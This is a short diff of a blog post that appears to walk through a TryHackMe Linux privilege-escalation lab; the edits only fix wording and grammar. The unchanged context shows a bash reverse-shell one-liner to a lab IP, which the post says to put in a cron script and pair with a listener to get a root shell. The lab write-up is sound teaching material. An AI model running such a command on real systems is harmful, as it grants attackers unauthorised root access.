dvdmtw98/blog/Post Vault/articles/2021-03-16-tryhackme-linux-privesc.md

 bash -i >& /dev/tcp/10.10.10.10/4444 0>&1
 ```

-**Note:** Replace the IP Address in the script with the TryHackMe VPN IP Address which can be found by running "ip a show tun0" on your Kali machine and looking under inet.
+**Note:** Replace the IP Address in the script with the TryHackMe VPN IP Address which can be found by running "ip a show tun0" on your Kali machine and looking under Inet.

-Then we can setup an listener on your Kali Machine which should give us an root shell (should take less than a minute to get an connection)
+Then we can set up a listener on your Kali Machine which should give us a root shell (should take less than a minute to get a connection)

 ![Adding Listener on Script|400](images/thm-linux-privesc/listener-on-cron-script.png)